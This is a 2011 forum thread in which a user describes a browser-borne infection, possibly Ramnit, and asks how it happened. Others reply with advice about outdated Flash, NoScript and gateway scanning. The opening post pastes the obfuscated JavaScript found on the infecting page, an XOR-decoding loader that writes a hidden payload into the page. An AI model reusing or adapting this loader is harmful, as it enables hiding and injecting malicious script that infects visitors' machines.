Javascript Firefox Virus - Ramnit?

lookitsjonno · 11 Nov 2011 at 09:59

Yesterday firefox allowed a virus to be installed through some Javascript embedded on a page (below), dispite having Avira and Security Essentials installed. Security essentials after a full scan did however remove it, but with great inconvenience.

How on earth did this happen :confused:

Secondly, traffic to antivirus sites is being redirected to 127.0.0.1, but my HOSTS file is clean? anywhere else I can look?

Code:

<script language='javascript'>var ewjiRNjmidvKoG='';WIMAZQPMxKxqknA='iHEcfS';var IqffjkAHo='jpwfEKWZbKHJzegTnSUTESWQujKdnRjXXQ';ylHHsiYQHIaPXHLWv='iyfGL';var upReKQvtmF=0;urNBMhiClQJSn='gkpWdT';var DsUUJQDkuAybtumCCfF='%4C%1E%66%37%2A%3A%3F%42%38%3A%29%47%47%0F%20%1A%23%6F%7B%6A%3D%32%23%58%0B%27%08%0B%20%44%37%2A%36%45%19%19%48%26%2C%3E%65%06%2E%2E%2B%0F%09%13%76%4E%35%27%35%28%36%35%3E%07%0E%2E%16%53%70%5A%7A%78%22%09%02%18%0A%29%22%39%3D%5F%69%26%25%58%45%0F%31%07%34%3D%20%78%71%66%73%55%1D%22%64%1A%3A%57%7A%69%73%4A%18%04%16%24%28%32%67%40%7A%6A%6A%0C%16%17%35%0D%36%68%76%74%71%77%3C%14%18%2C%0D%6E%25%03%3C%2C%39%57%52%47%44%65%26%36%28%05%22%26%22%1F%0C%67%3C%1A%6E%77%64%67%6D%6B%7E%1C%0C%39%05%03%37%54';tNZgZLbHExemhLK='GvZXxXwSSrDHywfWW';var YosCfDQXijJkMDP=DsUUJQDkuAybtumCCfF.length/3;IlZBYHGeUUNDJLapsbsm='SURgNCIJhZhmPmoyBDXNNx';DsUUJQDkuAybtumCCfF=unescape(DsUUJQDkuAybtumCCfF);UIvEdENLdScmkQKUjk='eKyjZLHyD';for(DeuIEsJXCIMaxHgXxVtwZs=0;DeuIEsJXCIMaxHgXxVtwZs<YosCfDQXijJkMDP;DeuIEsJXCIMaxHgXxVtwZs++){upReKQvtmF++;if(IqffjkAHo.length<=upReKQvtmF) upReKQvtmF=0;WszHMY=DsUUJQDkuAybtumCCfF.charCodeAt(DeuIEsJXCIMaxHgXxVtwZs); TrTgSjVLBgEHcZODeO='wcoYzlwCqQIWyrkzdORhfQC'; if(IqffjkAHo.charCodeAt(upReKQvtmF)!=WszHMY) WszHMY^=IqffjkAHo.charCodeAt(upReKQvtmF); goZMVdrRqfaRiXWfZEQdMeBo='SzEhKIQFgWMaqrCXm';ewjiRNjmidvKoG+=String.fromCharCode(WszHMY);} MJiRsETaWCMkbvgczphog='EtrwuSVKPLZg';document.write(ewjiRNjmidvKoG);nfKvvuWAHwGmawGVlLAHNHSOq='uqzMywr';</script>

anything I don't mind · 11 Nov 2011 at 10:58

This is realy why virus scanning and IDS should be on the gateway and not the end point imo.

This way these sorts of things are blocked before they reach the browser.

Check proxy settings or dns settings?

lookitsjonno · 11 Nov 2011 at 11:10

I checked out the plugins and it seems the version of flash had vulnerabilities, nice of firefox to tell me that isn't it :rolleyes:

I can't think to imagine how the poor computer illiterate soles of the country get on.

anything I don't mind · 11 Nov 2011 at 11:15

You could try firefox no script ext or flashblock. But they can become a bit of a hassle.

Crowort · 11 Nov 2011 at 11:24

NoScript is good but most people do find it too much of a hassle. Plus it is fairly hard for the average person (this includes me) to know what to allow and what not.

iviv · 11 Nov 2011 at 15:45

lookitsjonno said:
I checked out the plugins and it seems the version of flash had vulnerabilities, nice of firefox to tell me that isn't it

I can't think to imagine how the poor computer illiterate soles of the country get on.

Isn't that more of an issue with Flash? Its supposed to pop up itself when it needs updates, Firefox can't babysit all its plugins, neither does IE, or Opera.

Personally, I use Update Checker/[url] which does just that, scans for programs installed on your PC and then checks their version numbers with those available on its database, and tells you which are out of date.

PapaLazaru · 11 Nov 2011 at 16:09

groen said:
You could try firefox no script ext or flashblock. But they can become a bit of a hassle.

I tried it for a week but it starting driving me crazy. Quite a hassle so I just turned it off.